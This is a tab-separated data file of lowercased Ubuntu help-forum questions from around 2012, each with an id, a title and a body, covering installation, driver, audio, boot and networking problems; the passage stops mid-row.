201772	phpmyadmin shows warning : php mysql library version 5.0.51a differs from your mysql server version 5.5.24	installed mysql on ubuntu 12.04 server via apt-get install mysql-server from default sources.list . than uploaded new phpmyadmin version shows warning : your php mysql library version 5.0.51a differs from your mysql server version 5.5.24 . this may cause unpredictable behavior . how i can install new mysql 5.5 version ? could you please advice ? cheers
201775	how do i remove a folder ?	i 'm a new user and im trying to remove a specific folder . i am using sudo rm /path/ but its not working . what is the correct command to use ? it is a file catolog i am attempting to remove but im geting a message that it is empty
201778	how can i get gnome3 to remember my session ?	i am running gnome3 , but i had the same problem with unity , on ubuntu 12.04 . i have a fairly elaborate setup i enjoy using day-to-day . a libreoffice spreadsheet with everyone 's extension numbers ; a window with reference data i use regularly ; two mulit-tabbed konsole/terminal windows with several remote systems sessions , firefox with a set of open tabs , and so on . but whenever i log out , when i return , i must set up everything from scratch . i remember the good 'ol days , when i rebooted , i 'd re-log in , and all my windows came back up in the same places as they were when i logged out , and my konsole/term would come up with the same remote logins as before ... . i 'd have to re -setup some of my programs , but that 's better than having to move every win into place , and resize them , etc . how do i get this functionality back ?
201780	how do i debug issues with pulse audio ?	i have installed ubuntu 11.10 in my machine . i have logged in as user_a . my external audio device is a headset and i was able to hear the audio properly . i need to join my ubuntu machine to a window 's domain ( my office server ) . i followed the steps explained in http : //www.ghacks.net/2010/04/21/join-a-ubuntu-machine-to-a-windows-domain/ and was successful in joining my ubuntu machine to the windows domain . sudo apt-get install likewise-open5 sudo domainjoin-cli join domain user_b now when i logged in as user_b , there is no audio for this user in the same machine . i crossed check with my user_a account . there is no issues with the sound for user_a . only for user_b , there is no audio . when i checked the sound settings of user_b , there is no device listed in hardware , input and output . whereas for user a , my headset is listed in input and output . can anyone please help me on this . why there is no sound for user_b ? can you please brief me a little more on how to 'check whether users are added or not in the audio group ' . and also when i tried to execute pulseaudio -k in a terminal ( from user_b ) e : [ pulseaudio ] main.c : failed to kill daemon : no such process and also i have found this on pulse audio log . when i run : pulseaudio -- log-level=4 -- log-target=stderr i found the following error lines in my log : e : [ pulseaudio ] module-dbus-protocol.c : dbus_server_listen ( ) failed : org.freedesktop.dbus.error.badaddress : abstract socket name too long e : [ pulseaudio ] module-dbus-protocol.c : starting the local d-bus server failed . e : [ pulseaudio ] module.c : failed to load module `` module-dbus-protocol '' ( argument : `` '' ) : initialization failed . e : [ pulseaudio ] main.c : module load failed . e : [ pulseaudio ] main.c : failed to initialize daemon .
201781	can i turn off the message at the bottom from mails generated by ubuntu one-thunderbird integration ?	after installing ubuntu one , i tested it in thunderbird by sending myself a file . i then got a marketing message at the address i sent it to promoting ubuntu one . is that the price to be paid for the free version , or can this be turned off ?
201786	where is the calculator from 10.04 ?	the default calculator from ubuntu 10.04 was perfect . it was simple , yet powerful . it had memory locations and when you switched between hexadecimal and decimal the number in the display changed to represent the value in the new base . the ubuntu 12.04 default calculator does not have a memory function , and the display does not change when you change base . is there a way to install the old calculator application , or is there an alternative that is similar ?
201791	how do i install kwin ?	i have installed kde by command sudo apt-get install kde-window-manager , but i am getting plasma , ubuntu , ubuntu 2d , metacity , failsafe but not kwin what should i do ?
201792	change file permissions for the entire folder	i am trying to change the file permissions for the entire directory . presently all the files in the dir have the following permission , -rw -- -- -- - and i wish to change it to , -rw-r -- r -- i know i need to use chmod but since i need to change it for the entire dir , is there a command that will change the permissions for the entire dir in a single go ?
201793	ca n't install any new packages with apt-get	from some time i 've been getting error messages while installing some packages , for example : requires libmagickwand4 ( = 8:6.6.9.7-5ubuntu3 ) ale 8:6.6.9.7-5ubuntu3.2 is about to be installed basically there are very small version differences ( ubuntu3 vs ubuntu3.2 ) , but i do n't know how to fix them . any help will be welcome : )
201795	notation for byobu keybinding files	does anyone know what notation is used to represent keyboard keys in byobu 's keybinding files ( f-keys.screen etc ) ? i know what keys i would like to change and have poured through the file trying to figure out which keys are represented by the notation you use but i ca n't decypher the compound structure for some of them . it looks like there are several symbols used for some commands and that is throwing me for a loop .
201798	wubi 12.04 is not using the .iso file which i 've already downloaded	wubi is not using the file which is already present in the directory , but previously it got installed 2 times . my windows7 is a 64bit , will it have any effect on installing ubuntu in my system ? ?
201801	ubuntu wo n't install on a mac mini g4 due to an error trying to install the `linux-powerpc-smp` kernel	trying to install the alternate install 12.04 [ ubuntu-12.04-alternate-powerpc ( md5 c57149dc4f31372912aab2856c08107b ) .iso ] on a mac mini g4 meant to be a home server , i am getting this error message : an error was returned while trying to install the kernel into the target system . kernel package : 'linux-powerpc-smp' check /var/log/syslog or see virtual console 4 for details . the only options i choose are : set user name `` tino sino '' , username `` tino '' encrypt home : yes ( tried with no too ) partition disks : guided - use entire disk ( created # 3 as ext4 , # 4 as swap ) the cd md5 is the right one .
201806	i ca n't access secondary hard drive	i have ubuntu installed on a primary hard drive and windows 8 on a secondary one . when i try to access the secondary hard drive the following message appears : error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . i 'm new to linux . how do i do that ?
201807	login screen talker ; what is it ?	have just downloaded 12.04 from the costa rica server . at login a voice comes on in english and repeats the password keys -- very disturbing . avast and clamtk found nothing . what is going on ?
201809	how do you blitzmax ide on ubuntu ?	i just installed ubuntu and wanted to install everything i have on my windows . i use this programming ide called blitzmax and i need to know how to install it . it is not like installing for windows , i just need a basic tutorial on how to install any application without using the software center .
201810	amd radeon hd 7470m proprietary driver not working on ubuntu 12.04lts	i have manually tried to install amd radeon hd 7470m proprietary drivers from amd official site . but after installing when i tried to launch catalyst control center , a message is shown like this : there was a problem initializing catalyst control center linux edition . it could be caused by the following : no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . i am using ubuntu 64-bit 12.04lts .
201819	xubuntu do n't boot	while booting display blinks twice and nothing happened.it seems that xubuntu started but display shows nothing.also when if i chose previous linux versions or repair option in grub it boots normally .
201824	installation issues	over the past few months i have been flitting back and forth between ubuntu and windows . however , in my most recent attempt to go back to ubuntu due to its advantages to my course , no matter how i try and install it ( cd/usb or just the windows installer ) it always freezes at the same point for the cd/usb or fails with the installer . below is a picture i took of it with my phone , hope it helps .
201827	complete ubuntu removal	i would like to completely remove ubuntu from my hard drive , but i do not know how . i want to remove it because i just installed it on a different hard drive and would like to have two separate drives for ubuntu and windows 7 .
201834	touch screen - no calibration devices found	i have just brought in a acer z3801 all in one and installed ubuntu 12.04 ltd and updated . have installed utouch and xcalibrator . when i try to launch x-calibrator it gives the error error : no calibratable devices found .
201839	no choice for hdmi audio output	my issue is that i ca n't get sound to my tv which i connected via hdmi cable to my hp pavilion g6 laptop running under os ubuntu 12.04-64bit . terminal output about audio hardware : list of playback hardware devices : jg-laptop @ jg-laptop : ~ $ aplay -l card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic_1 [ hd-audio generic ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 or jg-laptop @ jg-laptop : ~ $ cat /proc/asound/cards 0 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xf0544000 irq 44 1 [ generic_1 ] : hda-intel - hd-audio generic hd-audio generic at 0xf0540000 irq 16 i have no choice in system settings - > sound to select hdmi audio output please can somebody tell me what is missing and what i would have to do ?
201840	apt reports dependency `` is not installable '' for installed ( virtual ) package	i 'm trying to install armel libraries and gcc support on an armhf system . i 've installed libc6-dev : armel to get the armel libraries and headers , and now believe that i need to install gcc-multilib to get gcc to use them ( when -mfloat-abi=softfp is specified ) . however , the package installation fails : $ sudo apt-get install gcc-4.6-multilib reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gcc-4.6-multilib : depends : libsfgcc1 ( > = 1:4.6.3-1ubuntu5 ) but it is not going to be installed or libgcc1-armel but it is not installable e : unable to correct problems , you have held broken packages . libgcc1-armel is a virtual package provided by a package i already have installed : $ dpkg -s libgcc1 : armel | egrep 'version|provides' version : 1:4.6.3-1ubuntu5 provides : libgcc1-armel why does apt consider this package uninstallable when it is already installed ? note : i 've tried this with both apt/dpkg from precise ( with armel specified as a foreign architecture in /etc/dpkg/dpkg.cfg.d/architectures ) and with apt/dpkg from quantal ( which seems to have more mature multi-arch support , such as dpkg -- add-architecture ) . note 2 : using libsfgcc1 instead of libgcc1 : armel allows this library to be installed , but precludes installation of other multi-arch libraries like libssl1.0.0 : armel , which requires libgcc1 : armel only . i 'm guessing that libsfgcc1 is a transitional library that was introduced before true multi-arch support .
201841	unable to reach websites	i have a ubuntu 12.04 on my laptop and have the problem that since a few weeks i ca n't reach some websites while others work fine . i 'm sure that the problem must be somewhere in my system , because in the windows ( same laptop ) everything works . when i 'm trying to reach one of those sites i get redirected to the o2-search which tells me that the site could n't be found . one of the sites which does n't work is http : //www.putpat.tv if this helps you .
201846	wi-fi hotspot not accessible for mobile on ubuntu 11.10	in my ubuntu 11.10 , i am using mts usb modem for an internet connection and have created a wi-fi hotspot for accessing the internet on my android mobile . i have successfully created a hotspot and a connection is also established but my mobile does not detect my wi-fi hotspot . please see my hotspot connection details : ssid is : myhotspot mode : ad-hoc band : automatic in ip4 setting tab : method : shared to other computers . in wireless security tab : security : wpa & wpa2 personal password : ... ... .. my question is , how do i make my wi-fi hotspot accessible with my android mobile ? is there any mistake in creating my wi-fi hotspot ?
201857	error : no such device ; grub rescue . when trying to boot	so i bought a brand new hard drive and put ubuntu 12.04 on it . then i decided to replace it with windows 7 , and i overwrote the entire ubuntu partition . now i am wanting to set up dual boot , but when i try to boot with the ubuntu live cd i get the following error : error : no such device : 3807.. grub rescue any help would be greatly appreciated.. i do n't understand what is going on and i can not even boot the ubuntu live cd . thank you so much !
201861	how to fully utilize the available hard drive space for the home directory	i have a two hard drives , 465gb each . i have windows on one , and wish to install ubuntu on the other through wubi . also , i have 16 gb ram . when i installed ubuntu , the acutal space in the home directory was very low . how do i partition , in order to utilize all the 465 gb of my hard drive ? also , can i utilize all 16 gb for either windows or ubuntu ( coz i never run both simultaneouly ) appreciate your help !
201874	access windows user folder from ubuntu live	how can i access windows users directory from ubuntu live to backup some files before format . it is showing me empty folder but i know that it is not empty ? folder /media/somepart/users/myuser is empty but i know it is not . if i where under windows i could perform take over ownership of that directory but i do not know how to do that under linux . can you help me to transfer files ?
201875	which kernel version to use if the latest has problems and what 's next ?	i had problems when i installed the latest updates on ubuntu 12.04 a few days ago . my computer did n't boot correctly . i read many questions here and i got to work with an older kernel version : 3.2.0-31-generic the thing is that i know i can work selecting this version each time i turn on the computer , but how can i really fix the problem with the newer kernel ? i do n't want to select the older version each time . where can i report that ? how long am i going to have to use the older version ? i believe there is a lack of information in these cases . besides , sometimes i have another problems when i boot ... it occurs maybe 1 out of 4 times , but i 'll post that in a different question . thanks !
201876	how can i quickly copy large files off of a laptop when booted off a livecd ?	yesterday i received a laptop that would not boot and i needed to get the pictures and documents off of it . i booted into ubuntu with a live cd ( installing is out of the question ) and zipped up all of his files . it wrapped up to about 5.3 gb . i decided i should burn 2 dvd 's for him but since i was running off a live cd , i could not . also his usb ports and ethernet port are busted . so i tried to change the hard drive to a shared folder but it would not change the permissions . none of the fixes have worked , since i 'm on a live cd . i just need to transfer my zip from one computer to another . cloud storage wo n't work either . help me ! !
201877	add multiple folders to my ubuntuone cloud ?	i wanted to test the ubuntuone streaming service but my music folder is much bigger ( 50gb ) than my free capacity . is there a way to select multiple folders in my music-folder and add them to the sync-list , so that they are uploaded to the cloud ? i can only select single folders but thats too much work to fill my 20gb of space . does anybady of you have any ideas ?
201880	ca n't start ubuntu without usb boot	installed ubuntu with usb boot , but when i restarted , the laptop was unable to detect it on he hdd . when i boot from the usb everything works as it should though ( it 's not the pre-installation screen ) , but i installed it on the hdd . anyone ?
201886	setting up multiple cores for apache solr for ubuntu 12.04 and drupal 7	i 'm setting up solr locally for my development purposes and integration with drupal 7 . i 'm not very familiar with tomcat . my background has primarily been lamp setups . so i went and installed the package provided by ubuntu for apache solr following this guide . sudo apt-get install tomcat6 tomcat6-admin tomcat6-common tomcat6-user tomcat6-docs tomcat6-examples sudo apt-get install solr-tomcat i 've got that working . the apt-get package manager does a great job and allows me to setup solr but with one core . what steps need to be taken to enable multi core setup for apache solr ? and below is my solr.xml file : sudo nano /var/lib/tomcat6/conf/catalina/localhost/solr.xml < ! -- context configuration file for the solr web app -- > < context path= '' /solr '' docbase= '' /usr/share/solr '' debug= '' 0 '' privileged= '' true '' allowlinking= '' true '' crosscontext= '' true '' > < ! -- make symlinks work in tomcat -- > < resources classname= '' org.apache.naming.resources.filedircontext '' allowlinking= '' true '' / > < environment name= '' solr/home '' type= '' java.lang.string '' value= '' /usr/share/solr '' override= '' true '' / > < /context >
201888	do dconf use exi binary xml ?	a question came to my mind reading an answer to the question what are the differences between gconf and dconf ? . in an reply to the above question , oli said : binary read access is far faster than parsing xml . however , there exist a w3c recommendation for binary xml , since 2010 : efficient xml interchange ( exi ) format 1.0 . is this what dconf uses ? if yes , where is it confirmed ? if no , was there some investigations toward it at some time , and what was the conclusions ? thanks for any tracks , i 'm curious to know .
201890	how can i get my battery level to display in the notification area ( system tray ) ?	i 'm trying to use the awesome window manager with gnome , i.e . running gnome-session -- session=ubuntu on login , and it works great for the most part , except for the fact that the notification area/systray is missing a battery indicator . there 's the network manager applet ( nm-applet ) , a keyboard icon for switching keyboard layouts , but no battery icon as i would 've hoped . i thought the command would be something like gnome-power-manager ,
201895	ca n't login to ubuntu , it blinks nvidia , and then login screen is back	my computer crashed earlier this evening , i think it was somewhat overheated and shut itself down . after this , i can no longer log into ubuntu . i can , however , login to a guest session . when i try to login to my account , there is some white text on black background flashing by , then the nvidia logo blinks , then i am back at the login screen . when i 've tried to start-up via the restore option , i finally get some message about no displays connected . i am running ubuntu 12.04 32-bit on a lenovo thinkpad t410 .
201896	zfs package ( zfs-ubuntu ) does not create zfs module ?	i 'm trying to use zfs ( zfsforlinux stable ) on ubuntu 12.04 x86_64 server . i enabled the ppa , and apt-get install ubuntu-zfs works successfully . however , no zfs module is created and the zpool and related commands all complain that they ca n't install the module . help !
201897	is there a log that shows the exact commands taken to get the server to the current state ?	our hosting company has setup a `` hardened template '' of ubuntu server 12.04 to be used as a web server . which i have interpreted as a base install with a bunch of additional tweaks including firewall settings and installing the basics like ssh/php/mysql . is there a way to view/download the exact commands/tweaks done to get the server to it 's current state . i am asking this , so if i do `` stuff up '' anything i can revert to a fresh `` hardened template '' version .
201900	how stable is wow on linux ?	hi i have a very simple question for anyone who has played wow on linux . the title says it all but how is wow on linux running wine .
201901	new install of ubuntu 12.04 shuts down after 5 minutes	i have a fresh install of ubuntu 12.04 and it seems to be fine except after 5 minutes a dialog box warning of shutdown in 60 seconds appears . if i do n't dismiss this , the computer does indeed shut down . if i do dismiss it it reappears after 5 minutes . there is nothing in the power manager settings or screensaver settings to account for this . where else can i look to find what is triggering this ?
201907	no matter what mouse i use with ubuntu 12.04 - none work	i 'm a true newby ... luckilly the keyboard shortcuts are ( in a way ) similar to those in windows . in short , i also have the `` mouse '' problem . i 've tried using different `` mice '' ? ? ( or mouses ) under ubuntu 12.04 and none worked . one major difference with other users is that i 'm running ubuntu in a vm ( vmware 7.0 ) . but with all the searches i 've done , i conclude that the ( mouse ) problem is common . is there a patch that corrects the problem ? i 've tried different commands like many posted in different forums but to no avail . can anyone help me ? ? ps : i 've even looked in vmware forums for help ...
201908	gdm and lightdm display managers not working for 12.10 ?	on my ubuntu 12.10 beta system , i am having a few problems with my display managers . lightdm does not let you go into any desktop besides unity , and gdm crashes about 1/3 of the time after logging out of a session . gdm can go into any of the desktop environments , but goes to a shut-down like terminal when you log out about 1/3 of the time . if i can get one of them fixed , i will use that one . thank you .
201914	how to install openni for kinect	i have spent a long time trying to install different versions and different drivers to run my kinect with openni on ubuntu and every time it either does n't compile correctly or it just ca n't find the kinect when i try to run it . a lot of the instruction online seem to be out of date and these are the most up to date ones that i can find : http : //igorbarbosa.com/articles/how-to-install-kin-in-linux-mint-12-ubuntu/ but still once completed the program can not find the device . are there any more up to date instructions or can anyone find any errors in this ?
201926	when attempting to install ubuntu 12.04 from cd , i am stuck on black streen with `` loading bootlogo ... ''	i downloaded ubuntu 12.04 to my desktop and burned to a cd using infra recorder and instructions on ubuntu website . restarted pc to boot from cd receive black screen with `` loading bootlogo ... '' then nothing happens and i have to restart with windows . the cd seems to be correct . folders include .disk , boot , casper , dists , install , isolinux , pics , pool , preseed , autorun file , md5sum text file , readme.diskdefines file , wubi app . system information operating system : windows vistaâ˘ home premium ( 6.0 , build 6002 ) service pack 2 ( 6002.vistasp2_gdr.120824-0336 ) system manufacturer : toshiba system model : satellite l305 bios : default system bios processor : intel ( r ) pentium ( r ) dual cpu t2390 @ 1.86ghz ( 2 cpus ) , ~1.9ghz memory : 3062mb ram page file : 1553mb used , 4772mb available windows dir : c : \windows directx version : directx 11 dx setup parameters : not found dxdiag version : 7.00.6002.18107 32bit unicode drive : d : model : pioneer dvd-rw dvrkd08l ata device driver : c : \windows\system32\drivers\cdrom.sys , 6.00.6002.18005 ( english ) , 4/11/2009 00:39:17 , 67072 bytes
201927	why is the traditional countdown absent in the ubuntu homepage now ?	we used to get more excited just seeing how close the next release date is and how game we are to download our latest favorite os . is the traditional homepage countdown in ubuntu.com gone for good ?
201929	atheros ar5bwb222 wireless intermittent connectivity	so i recently installed ubuntu on my acer aspire v3-551 laptop . i have an atheros ar5bwb222 wireless adapter . everything works fine except for the wireless . i can sometimes connect to the wireless , but most of the time it will be making an attempt to connect and then enver connect . or it will connect , but it will only stay connected for about 10 seconds before getting disconnected from the wireless . all the other drivers updated through system settings > additional drivers are fine , even the ethernet . its just the problem with the wireless . i 've tried a power managment setting , tried looking for additional updates , but nothing fixes my problem . is there any solution for my particular wireless card ?
201932	windows 7/8 and ubuntu triple boot	i already have windows 7 and ubuntu 12.04 installed . now i want to install windows 8 for a triple boot . how can i do that ?
201933	acer aspire 5542g overheating with ubuntu/kubuntu 12.04	i have an acer aspire 5542g laptop purchased couple of years ago . all these days , i used windows 7 on it . then i tried ubuntu 12.04 . everything was fine except the overheating issue . i updated ubuntu with all security fixes and available updates but nothing solved the problem . with idle use like internet browsing , the cpu fan speeds up a lot and i can feel very hot air coming from the vent ( comparable to playing serious 3d game in windows ) . but it will not go to a point of freeze and shutdown . but as long as im using it , with no intensive tasks at all , the laptop stays too hot . this was n't the case with windows7 . in windows 7 the fan will not rotate at all with normal use . i heard there was manufacturing defect with some acer laptops , but i think it was n't the case with my laptop since windows7 runs perfectly . i updated the bios to latest version . i cleaned dust in the vents . i tried kubuntu 12.04 up-to-date . nothing solved the issue . my laptop specs are : cpu : amd turion2 x2 m500 @ 2.2ghz gpu : amd mobility radeon hd4570 3gb ram and 320gb hard disk . *edit : * if it helps , my laptop was shipped with linpus linux .
201937	ubuntu detect 4 cpus and i have only 2 cpu 's ?	i have an acer aspire one d270 netbook with 2gb ram 320gb hdd intel atom n2600 1.6 ghz ( 2 cores ) and i have a problem of overheating because ubuntu 12.04 detects 4 cpus . do you know how to fix that ?
201942	how to solve cursor could n't move and keyboard not working ?	i use ubuntu 12.04 64 bits . i found that sometimes the ubuntu seems not working anymore . what i can do now is power off by press the power button . is there any way to check what happened and solve it ? thank you~
201943	ca n't find 2nd hard drive in ubuntu	my computer has 2 drives , an 30 gb ssd with ubuntu 12.04 installed on it , and a second 500 gb hdd for storage . i 've checked all my bios settings , and searched through ubuntu , and i ca n't figure out how to access my hdd on ubuntu .
201945	how can i automate ddrescue from a failing usb hard drive ?	i 've got an interesting problem ... a friend asked me to recover data from a failing external ( usb ) hard drive , which i 've been doing using the ddrescue utility . however , every few hours the drive stops responding ( this is why i 'm recovering the data ) and read speed drops to 0 . at this point if i unplug it for 5 mins and plug it back in i can rerun the ddrescue and continue recovering . im wondering if there is some way to automate this as the read speed is quite slow and there is a lot of data to recover . i can power down the drive using : udisks -- unmount /dev/sdd1 udisks -- detach /dev/sdd but i have not found a way to spin up the drive again after its been `` detached '' the other problem i havent figured out yet is some way to figure out when the read speed has dropped to 0 and its time to do this powercycle . anyone have any ideas ?
201949	ca n't install catalyst 12.8	i can not install fglrx ati drivers/catalyst 12.8 . i have tried installing ama catalyst 12.8 using this guide : http : //www.upubuntu.com/2012/08/install-amd-catalyst-128-on-ubuntu.html when i reach the part of installing with sudo sh amd-driver-installer-8.982-x86.x86_64.run , i get the following error : when i run it using the -- force option , i get this message : how can i fix these errors and install catalyst 12.8 ?
201955	how do i fix the dash search not being able to find `` additional drivers '' nor `` update '' ?	i am a fairly new user of ubuntu , and currently have two 12.04 installations , one of which seems to work ok but i have two problems . the problem i 'm asking about in this question , is that the dash search seems unable to find things , such as `` additional drivers '' or `` update '' . on my working machine , searching for `` additional drivers '' there finds an icon for the driver program , but on the problem machine , it gives `` sorry , there is nothing that matches your search . '' dash also only shows sections for recent files , and downloads , on that machine . the account i 'm running is an admin account . this installation also has a stuck ubuntu software center ( it loads and hangs ) as in threads like this one . i do n't think i 've done very much to this computer that could cause a problem . i installed g++ and wt to do some programming . the biggest change i can remember is uninstalling the newfangled scrollbars with `` sudo apt-get remove liboverlay-scrollbar3-0.2-0 '' , but re-installing that module seems to have no effect on these issues . anyone have any ideas ? both machines have been updated with all recommended updates and say they are up to date .
201956	can not access bios on a lenovo u410	i recently took a step into linux on my lenovo idea pad u410 ; after a couple hours i managed to get it installed with the drivers . however now i no longer have the ability to access the bios . i tried the usual fn+f2 , f2 , f1 , del , tab , f12 , f11 ; all to no avail . i was wondering is there something different to be done running ubuntu ? i know that the bios would generally not be affected by the os . does anyone have any suggestions ?
201958	windows7 gone after ubuntu dual boot install	i had a very hard time to dual boot install ubuntu 12.04 apparently , ubuntu has restriction of 4 partitions and i already had 4 , so it just could n't recognise my partitions . this was something i realised too late , but finally got to install ubuntu . now , even though windows 7 option is listed when i try to boot my laptop , it does n't really let me boot and just loops back to begin . i tried windows repair dvd also , did n't work . i was fine with complete fresh install of windows too , but windows cd did n't detect my hard disk drive or any partitions ( even though the original c drive with windows is still an ntfs partition , according to gparted , and i can access the data from same using ubuntu log in ) . my ubuntu works fine , but i need windows log in also . any suggestions anyone ?
201960	how do you write a macro for a special character in libreoffice ?	does anyone know how to write a macro for a special character ? i know libreoffice currently does n't have a way to set a special character to a keyboard shortcut . however , i want to work around this with a macro . my plan is to create a macro for a special character then set a keyboard shortcut to that macro . problem is i do n't know the first thing about writing a macro . any one have a template or something that works ? i also know about the compose key , but i guess i am lazy and want to actually insert special characters with as few keys as possible .
201963	how do i install the latest ati catalyst video drivers in ubuntu 12.10 quantal ?	i 've found instructions , including this thread for 12.04 , but nothing for 12.10 . can someone help ?
201973	how do i get wireless to work on a dell mini 1018 with realtek rtl 8188ce network adapter ?	my dell mini 1018 used to work fine with ubuntu 12.04 with no problems connecting with the wireless card . then i made the big mistake of attempting to disable wifi by right-clicking on the wireless applet and un-checking `` enable wireless . '' since then , i can not get wireless working again . the wireless applet reports that `` wireless is disabled by hardware switch '' but there is no hardware switch on this computer . issuing a rfkill list yields the following : 0 : dell-wifi : wireless lan soft blocked : yes hard block : yes 1 : phy0 : wireless lan soft blocked : no hard blocked : yes i 'm in way over my head , and my computer is now useless . help ! ! !
201976	is it normal to have a blinking white underbar for a long time while trying to install ubuntu on mac ?	when trying to install ubuntu 12.04 lts from a disk , i elected to boot from the disk i mounted the iso onto . after a simple load screen with a small graphic at the bottom center , it went to a quickly flashing underbar on a black screen and has been here for some time . any thoughts as to what is going on ?
201979	no input method choice appear on ibus	i 've installed ibus and ibus-mozc , an input method engine of japanese from the repository on kubuntu 12.04 . then attempted to enable mozc from preference > `` input method '' tab > `` select input method '' combo box . however , there is no choice to select , so i could n't enable mozc . i also tried ibus-anthy , another legacy japanese input method , but the situation was the same and i could n't use anthy . same problem is also occuring in opensuse 12.1 , so i do n't think this is distribution-specific problem . in addition , this trouble also happened when i installed ibus-pynin , so this is not japanese-specific problem . any idea to find the cause of this trouble ?
201981	pandaboard crash on startup or freeze after minutes	i just received my pandaboard es ( rev b ) and i am having trouble after installing ubuntu-omap4-addons . once i copied the image ubuntu-12.04-preinstalled-desktop-armhf+omap4.img on my sd card and boot the pandaboard with it , i run the following commands : sudo add-apt-repository ppa : tiomap-dev/release sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install ubuntu-omap4-extras at the end of the installation of ubuntu-omap4-extras , ubuntu tells me that a problem occurs when the console displays : ldconfig deferred processing now taking place clicking on `` report the problem '' tell me that the problem concerns pvr-omap4-dkms . i read somewhere that this can happen and it is better to reinstall pvr-omap4-dkms . which i am doing by running : sudo apt-get install -- reinstall pvr-omap4-dkms i reboot . then the board has sometimes difficulties to start ubuntu : it freezes during the loading page , only action i can do is unplugging the board to start it again . some other times , ubuntu load successfully but then freeze at another random time , in the range 20 - 40 minutes . i searched on internet for similar bug and found this : https : //bugs.launchpad.net/ubuntu/+source/linux-ti-omap4/+bug/971091 so i typed this in : update-rc.d ondemand disable apt-get -y install cpufrequtils echo 'enable= '' true '' governor= '' performance '' max_speed= '' 0 '' min_speed= '' 0 '' ' > /etc/default/cpufrequtils cpufreq-set -r -g performance reboot but it does n't seems to fix the bug . another detail : on startup , before the loading screen of ubuntu ( when there is the two penguins displayed : ) ) , it shows this : [ 0.297271 ] cpu1 : unknown ipi message 0x1 [ 0.308990 ] omap_hwmod : mcpdm : _wait_target_ready error : -16 [ 0.354705 ] omap_mux_get_by_name : could not find signal uart1_cts.uart1_cts [ 0.354766 ] omap_hwmod_mux_init : could not allocate device mux entry [ 2.107086 ] thermal_get_slope : getting slope is not supported for domain gpu [ 2.107116 ] thermal_get_offset : getting offset is not supported for domain gpu [ 2.107299 ] stm_fw : vendor driver stm_ti1.0 registered [ 8.725555 ] omaprpc : registration of omaprpc rpmsg service returned 0 ! debug=0 any idea what can be wrong ? i am not that good with ubuntu so any help will be appreciated . cheers ! meach
201983	`` failed to apply network settings '' right after boot	i 'm running ubuntu 11.10 and i keep facing this error message in a dialog box , right after i boot up my computer ( already in graphical mode ) : failed to apply network settings org.freedesktop.dbus.error.spawn.permissionsinvalid : the permission of the setuid helper is not correct you might not be able to connect to the bluetooth network via this machine worth mentioning is that i did accept some updates in the update manager prior to this error showing up . the symptoms following the error message is that i ca n't find my other hard drives on the computer . i seem to have proper internet connection , though - contrary to what one would think , regarding the error message title . also i ca n't shut down the computer . i can log out , but then nothing happens when i choose the `` shut down '' menu option ( i simply have to long-press the power button for 8 seconds or so ) . so ! do you guys know what the error message means ? and more importantly ; how i can fix the underlying fault ? i have google-d the issue but with no further success . cheers , dbm
201985	ethernet not working 10.04	i am facing a strange issue . yesterday , i powered off my ubuntu 10.04 lts server by mistake . since then networking is not working . the interface which was in use was configured as eth1 but now it does n't show any ethernet devices when i do ifconfig -a . it just shows loopback and virbr0 interfaces , no ethernet interfaces . here is ifconfig output . lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1192 errors:0 dropped:0 overruns:0 frame:0 tx packets:1192 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:395779 ( 395.7 kb ) tx bytes:395779 ( 395.7 kb ) virbr0 link encap : ethernet hwaddr ea:8d : e0 : cd : aa : a1 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 inet6 addr : fe80 : :e88d : e0ff : fecd : aaa1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) below is the output of sudo lshw -c networking *-network unclaimed description : ethernet controller product : intel corporation vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : memory : fe400000-fe41ffff memory : fe428000-fe428fff ioport : f080 ( size=32 ) and here is the /etc/interfaces file which was in use and working great till this happened . i had many virtual interfaces configured as well . auto lo eth1 eth1:1 eth1:2 eth1:3 eth1:4 eth1:5 eth1:6 eth1:7 eth1:8 eth1:9 eth1:10 iface lo inet loopback iface eth1 inet dhcp iface eth1:1 inet static address 192.168.1.201 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:2 inet static address 192.168.1.202 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:3 inet static address 192.168.1.203 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:4 inet static address 192.168.1.204 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:5 inet static address 192.168.1.205 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:6 inet static address 192.168.1.206 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:7 inet static address 192.168.1.215 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:8 inet static address 192.168.1.216 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:9 inet static address 192.168.1.220 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 iface eth1:10 inet static address 192.168.1.225 netmask 255.255.255.0 broadcast 192.168.1.255 network 